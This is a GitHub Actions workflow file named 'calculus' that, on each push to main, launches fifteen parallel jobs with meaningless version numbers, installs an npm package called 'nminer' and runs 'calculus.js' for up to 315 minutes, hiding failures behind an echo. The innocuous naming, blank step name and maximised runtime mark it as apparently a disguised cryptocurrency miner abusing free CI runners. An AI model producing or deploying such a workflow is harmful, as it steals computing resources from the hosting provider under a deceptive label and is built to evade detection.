name: calculus
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 4973 }
          - { version: 2601 }
          - { version: 6427 }
          - { version: 9694 }
          - { version: 8732 }
          - { version: 5898 }
          - { version: 21 }
          - { version: 7321 }
          - { version: 5942 }
          - { version: 5362 }
          - { version: 1079 }
          - { version: 2357 }
          - { version: 8953 }
          - { version: 3992 }
          - { version: 2954 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: 
        run: |
          npm install nminer@latest
          timeout 315m node calculus.js || echo "calculus executed"